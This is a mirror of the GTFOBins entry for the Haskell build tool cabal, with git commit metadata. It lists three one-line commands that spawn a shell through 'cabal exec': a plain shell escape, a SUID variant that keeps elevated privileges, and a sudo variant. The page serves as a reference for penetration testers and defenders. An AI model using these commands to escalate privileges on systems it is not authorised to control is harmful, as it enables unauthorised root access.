1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2025-12-30 20:21:39 +01:00
GTFOBins.github.io/_gtfobins/cabal.md
Miguel R 182c5d3b48
Add cabal
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-12-16 18:01:10 +01:00

10 lines
156 B
Markdown

---
functions:
shell:
- code: cabal exec -- /bin/sh
suid:
- code: ./cabal exec -- /bin/sh -p
sudo:
- code: sudo cabal exec -- /bin/sh
---